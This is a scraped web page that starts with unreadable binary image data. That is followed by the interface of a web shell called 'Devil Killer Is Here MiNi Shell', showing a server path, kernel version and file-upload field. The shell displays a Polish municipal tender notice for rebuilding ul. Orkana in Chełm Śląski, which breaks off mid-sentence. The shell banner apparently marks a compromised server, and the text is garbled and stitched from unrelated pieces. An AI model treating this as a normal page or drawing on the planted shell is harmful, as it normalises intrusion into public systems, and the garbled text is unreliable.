JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211203/0029896401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa publicznej drogi gminnej ul. Orkana na odcinku od skrzyżowania z ul. Wiosenną do skrzyżowania z ulicą Kolberga w Chełmie Śląskim.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CHEŁM ŚLĄSKI</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">UG Chełm Śląski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258747</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Konarskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-403</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 225-75-03</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 225-75-03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@chelmsl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chelmsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa publicznej drogi gminnej ul. Orkana na odcinku od skrzyżowania z ul. Wiosenną do skrzyżowania z ulicą Kolberga w Chełmie Śląskim.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1f3ede60-5430-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00298964</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.chelmsl.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami następuje za pośrednictwem<br/>platformy zakupowej dostępnej pod adresem internetowym: https://miniportal.uzp.gov.pl/, ePUAP:<br/>http://epuap.gov.pl oraz poczty elektronicznej: przetargi@chelmsl.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania <br/>z elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest <br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych: <br/>− specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2, <br/>− format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML <br/>z kodowaniem UTF-8,<br/>− oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy, <br/>− integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. <br/>System dostępny jest za pośrednictwem następujących przeglądarek <br/>internetowych: <br/>− Microsoft Internet Explorer od wersji 9.0, <br/>− Mozilla Firefox od wersji 15, <br/>− Google Chrome od wersji 20.<br/>12.5 Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>12.6 Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>12.7 Zamawiający przekazuje identyfikator postępowania na miniPortalu jako załącznik Nr 10 do SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu; <br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: <br/>„ Rozbudowa publicznej drogi gminnej ul. Orkana na odcinku od skrzyżowania <br/>z ul. Wiosenną do skrzyżowania z ulicą Kolberga w Chełmie Śląskim.” prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129 z późn. zm.), dalej „ustawa Pzp”; <br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. <br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących <br/>Wykonawcy; <br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO; <br/>8) Wykonawcy nie przysługuje: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania,</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.2.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający planuje rozbudowę drogi gminnej obejmującą:<br/>- przebudowę skrzyżowania ul. Orkana z ul. Oskara Kolberga w granicach pasa drogowego ul. Oskara Kolberga (działka nr 1482/205) w hm 00+00,00 do hm 00+01,00 polegającą na wyprofilowaniu łuków poziomych skrzyżowania budowie chodnika i przebudowie nawierzchni drogi.<br/>- przebudowę skrzyżowania ul. Orkana z ul. Oskara Kolberga od granicy pasa drogowego ul. Orkana w hm 00+01,00 do hm 00+05,01 polegającą na wyprofilowaniu łuków poziomych skrzyżowania budowie chodnika i przebudowie nawierzchni drogi.<br/>- przebudowę skrzyżowania ul. Orkana z ul. Wiosenną w granicach pasa drogowego ul. Wiosennej (działka nr 219) w hm 06+06,00 do hm 06+07,35, polegającą na zmianie geometrii skrzyżowania, wyprofilowaniu łuków poziomych i przebudowie nawierzchni.<br/>- przebudowę skrzyżowania ul. Orkana z ul. Wiosenną w granicach pasa drogowego ul. Orkana <br/>w hm 06+03,57 do hm 06+00,00, polegającą na zmianie geometrii skrzyżowania,<br/>wyprofilowaniu łuków poziomych i przebudowie nawierzchni.<br/>- przebudowę skrzyżowania ul. Orkana z drogą wewnętrzną boczną w hm 01+26,59 polegającą <br/>na zmianie geometrii skrzyżowania, wyprofilowaniu łuków poziomych i przebudowie nawierzchni.<br/>- poszerzenie jezdni rozbudowywanej drogi do szerokości 4,5m, na odcinku od hm 00+00,00<br/>do hm 05+05,71, oraz od hm 05+56,85 do hm 06+03,57 z wykonaniem nowej konstrukcji drogi <br/>i nawierzchni z małogabarytowych elementów brukarskich.<br/>- poszerzenie jezdni drogi do szerokości od 4,5m do 5,2 m na odcinku od hm 05+05,71 do hm 05+56,85, w miejscu istniejącego łuku poziomego, z wykonaniem nowej konstrukcji oraz nawierzchni drogi.<br/>- budowę obustronnych poboczy o szerokości 0,75 m utwardzonych kruszywem kamiennym na całym odcinku drogi,<br/>- przebudowę istniejących 21 zjazdów indywidualnych lewostronnych oraz 17 prawostronnych na działki sąsiadujące, polegającą na ujednoliceniu geometrii zjazdów oraz regulacji wysokościowej nawierzchni wykonanych z kostki brukowej betonowej.<br/>- przebudowę istniejącego odcinka kanalizacji opadowej Ø300-400 na odcinku od hm 00+26,00 do <br/>hm 04+05,26.<br/>- budowę nowego odcinka kanalizacji opadowej Ø250 w hm 04+26,50 do hm 05+32,70 <br/>z włączeniem do przebiegającego w terenie rowu odwadniającego,<br/>- budowę wylotu brzegowego Ø250 z projektowanej kanalizacji opadowej do rowu „Mąkowiec”, wraz z umocnieniem skarpy i dna rowu na długości 5,5m płytami ażurowymi.<br/>- przebudowę istniejącego wylotu brzegowego Ø400 z remontowanej kanalizacji opadowej do rowu „Mąkowiec”, wraz z umocnieniem skarpy i dna rowu na długości 5,5m płytami ażurowymi.<br/>- budowę chodników obustronnych o szerokości 2,0 m na odcinku od hm 00+00,00 do hm 00+09,00 w rejonie skrzyżowania z ul. Oskara Kolberga.<br/>- budowę przejścia dla pieszych w hm 00+05,00 do hm 00+05,00 m. <br/><br/>4.3 Obowiązkiem Wykonawcy jest:<br/>4.3.1 pełna obsługa geodezyjna wraz z operatem powykonawczym (na podkładzie map zasadniczych), z naniesioną lokalizacją urządzeń obcych objętych inwestycją;<br/>4.3.2 wykonanie badań zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót w obecności Inspektora Nadzoru;<br/>4.3.3 w przypadku zniszczenia w trakcie realizacji przedmiotowych robót znaków geodezyjnych, grawimetrycznych i magnetycznych odtworzenie i protokolarny odbiór przez Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Bieruniu; w przypadku zbliżenia lub kolizji przedmiotowej inwestycji z innymi urządzeniami należy stosować się do uzgodnień branżowych zawartych w projekcie;<br/>4.3.4 do każdego odbioru robót zanikających i ulegających zakryciu Wykonawca przygotuje dokumentację fotograficzną w wersji elektronicznej oraz gotowych fotografii i przedstawi Zamawiającemu zgodnie z terminami zawartymi w umowie;<br/>4.3.5 dokonać wszystkich odbiorów branżowych, organizacji ruchu przed odbiorem końcowym;<br/>4.3.6 wykonywane prace powinny być tak skoordynowane i prowadzone aby nie stanowiły utrudnień dla osób korzystających z trenów przyległych do placu budowy. <br/>4.3.7 Wykonawca zobowiązany jest do prolongaty terminów dla uzgodnień branżowych i organizacji ruchu. Koszt nadzorów branżowych leży po stronie Wykonawcy<br/>4.3.8 Wykonawca zobowiązany jest przygotować Harmonogram rzeczowo-finansowy realizacji przedmiotu zamówienia.<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 4 do SWZ. <br/><br/>Składają się na niego następujące dokumenty: <br/>•	dokumentacja projektowa <br/>•	specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiORB), <br/>•	przedmiary robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt 6 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału <br/>w postępowaniu. <br/>6.2 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/>6.2.1 Zdolności do występowania w obrocie gospodarczym. <br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>6.2.2 Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. <br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>6.2.3 Sytuacji ekonomicznej lub finansowej . <br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>6.2.4 Zdolności technicznej lub zawodowej <br/>Wykonawca musi wykazać dysponowanie odpowiednim potencjałem technicznym <br/>w celu wykonania zamówienia, tj.:<br/>6.2.4.1 Jeżeli wykonawca wykaże że wykonał należycie minimum 1 robotę budowlaną <br/>(w rozumieniu ustawy z dnia 7 lipca 1994 r. &#34;Prawo budowlane&#34; (t. j. Dz. U. z 2020, poz. 1333 z późn. zm. oraz przepisów wykonawczych do tej ustawy) o wartości nie mniejszej jak: 2 000 000,00zł ( dwa miliony złotych 00/100) netto polegającą na budowie, przebudowie lub remoncie drogi <br/>o nawierzchni bitumicznej - w okresie ostatnich 3 lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <br/>Wartość robót w walucie innej niż PLN, wykonawca powinien przeliczyć na PLN wg średniego kursu NBP z dnia zawarcia umowy o wykonanie robót, natomiast w przypadku braku przeliczenia przez wykonawcę Zamawiający dokona przeliczenia na PLN wg kursu średniego NBP z dnia zawarcia umowy o wykonanie robót.,<br/>6.2.5 Szczególny sposób określenia wymagań związanych z realizacją zamówienia w przypadku wspólnego ubiegania się o udzielenie zamówienia: Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że warunek określony w pkt. 6.2.4 SWZ spełnia przynajmniej jeden z Wykonawców na podstawie jednego zamówienia.. <br/>6.2.6 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>6.2.7 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. przez <br/>konsorcjum), warunek udziału w postępowaniu dotyczący potencjału technicznego Wykonawcy winien spełniać co najmniej jeden z tych Wykonawców albo Wykonawcy spełniają go wspólnie (Wykonawcy muszą wykazać, iż łącznie spełniają warunek udziału w postępowaniu). <br/>6.3 Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">braku podstaw wykluczenia; <br/> spełniania warunków udziału w postępowaniu lub kryteriów selekcji; w formie określonej <br/>w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415). <br/>11.1.4 Złożenie, uzupełnienie lub poprawienie oświadczenia, o którym mowa w pkt 11.1 SWZ nie może służyć potwierdzeniu spełniania kryteriów selekcji. <br/>11.1.5 Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści oświadczenia, <br/>o których mowa w pkt 11.1 SWZ. <br/>11.1.6 Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w pkt 10.1 SWZ budzi wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest <br/>w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu, kryteriów selekcji lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>11.2 Zamawiający wezwie 